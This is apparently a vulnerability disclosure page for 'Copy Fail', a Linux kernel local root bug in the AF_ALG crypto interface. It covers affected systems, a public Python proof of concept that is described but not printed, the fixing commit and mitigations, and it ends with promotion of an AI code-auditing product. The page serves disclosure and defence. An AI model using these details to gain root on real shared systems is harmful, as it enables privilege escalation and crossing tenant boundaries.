Copy Fail – CVE-2026-31431

Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.

If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.

Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro's default config, so the entire 2017 → patch window is in play out of the box.

Distributions we directly verified:

These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.

Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.

The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.

GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.

Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.

Single-tenant production where only your team has shell access.

You're already the only user. The bug doesn't grant remote attackers access by itself, but any local code execution becomes root.

The PoC is published so defenders can verify their own systems and validate vendor patches.

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).
Targets /usr/bin/su by default; pass another setuid binary as argv[1].

Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431

Patch first. Update your distribution's kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.

Before you can patch: disable the algif_aead module.

What does this break? For the vast majority of systems — nothing measurable.

For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.

Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.

The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.

Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.

Finalist in the AI Cyber Challenge hosted by DoD DARPA.

Most-winning team in DEF CON CTF history.